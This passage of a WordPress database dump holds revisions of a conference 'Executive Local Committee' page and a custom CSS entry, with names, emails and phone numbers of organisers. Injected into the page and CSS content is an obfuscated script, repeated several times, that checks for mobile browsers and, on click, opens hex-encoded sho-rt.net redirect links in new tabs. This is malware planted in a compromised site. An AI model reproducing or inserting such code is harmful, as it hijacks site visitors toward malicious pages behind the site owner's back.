_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:36:15','2023-06-27 10:36:15','',4849,'https://gsw2023.com/?p=4906',0,'revision','',0),
(4908,4,'2023-06-27 10:42:08','2023-06-27 10:42:08','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Local Web director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687862064787{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\"][vc_column_text css=\".vc_custom_1687862522700{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"no-border\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:42:08','2023-06-27 10:42:08','',4849,'https://gsw2023.com/?p=4908',0,'revision','',0),
(4909,4,'2023-06-27 10:42:10','2023-06-27 10:42:10','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n.no-border, .no-border *{\n	border: none !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 